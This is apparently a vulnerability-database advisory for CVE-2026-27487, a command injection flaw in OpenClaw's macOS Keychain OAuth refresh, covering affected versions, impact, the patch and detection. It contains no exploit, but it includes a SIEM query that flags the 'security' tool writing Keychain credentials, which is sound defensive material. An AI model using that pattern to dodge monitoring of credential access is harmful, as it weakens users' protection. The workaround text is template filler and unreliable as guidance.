Login Sign Up

CVE-2026-27487

7.6 HIGH

📋 TL;DR

OpenClaw versions 2026.2.13 and below on macOS are vulnerable to OS command injection when refreshing OAuth tokens in the Keychain. This allows attackers to execute arbitrary commands with the user's privileges. Users of OpenClaw on macOS with affected versions are impacted.

💻 Affected Systems

Products:
  • OpenClaw
Versions: 2026.2.13 and below
Operating Systems: macOS
Default Config Vulnerable: ⚠️ Yes
Notes: Only affects macOS due to Keychain integration; other OS versions are not vulnerable.

📦 What is this software?

Openclaw by Openclaw

View all CVEs affecting Openclaw →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise via arbitrary command execution, potentially leading to data theft, ransomware deployment, or persistent backdoor installation.

🟠

Likely Case

Local privilege escalation or unauthorized access to sensitive system resources and user data stored in Keychain.

🟢

If Mitigated

Limited impact if proper input validation and command sanitization are implemented, restricting execution to intended operations only.

🌐 Internet-Facing: LOW
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires user interaction to trigger OAuth token refresh; no public exploits are known at this time.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 2026.2.14

Vendor Advisory: https://github.com/openclaw/openclaw/releases/tag/v2026.2.14

Restart Required: No

Instructions:

1. Update OpenClaw to version 2026.2.14 or later. 2. Verify the update by checking the version. 3. No restart is required, but restarting the application is recommended.

🔧 Temporary Workarounds

Disable OAuth Token Refresh

macOS

Prevent the vulnerable credential refresh process from executing.

Not applicable - configuration change only

Use Alternative Authentication

macOS

Switch to API keys or other authentication methods that don't use OAuth token refresh in Keychain.

Not applicable - configuration change only

🧯 If You Can't Patch

  • Restrict user permissions to limit potential damage from command execution.
  • Monitor system logs for unusual security or keychain access patterns.

🔍 How to Verify

Check if Vulnerable:

Check OpenClaw version; if it's 2026.2.13 or below on macOS, it's vulnerable.

Check Version:

openclaw --version

Verify Fix Applied:

Confirm OpenClaw version is 2026.2.14 or later and test OAuth token refresh functionality.

📡 Detection & Monitoring

Log Indicators:

  • Unusual security command executions
  • Failed Keychain access attempts
  • Suspicious process spawns from OpenClaw

Network Indicators:

  • Unexpected outbound connections from OpenClaw process

SIEM Query:

process_name:"security" AND parent_process:"openclaw" AND command_line:"add-generic-password"

📊 Metadata

CVE ID: CVE-2026-27487
CVSS v3 Score: 7.6 (HIGH)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L
CWE: CWE-78
Published: February 21, 2026
Last Updated: February 23, 2026

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2026-27487, you might also want to check these:

CVE-2023-2564 10.0

This CVE describes an OS command injection vulnerability in scanservjs web scanning software that al...

Same vulnerability type (CWE-78)
CVE-2024-58338 10.0

Anevia Flamingo XL 3.2.9 contains a restricted shell escape vulnerability that allows remote attacke...

Same vulnerability type (CWE-78)
CVE-2025-26389 10.0

This critical vulnerability allows unauthenticated remote attackers to execute arbitrary code with r...

Same vulnerability type (CWE-78)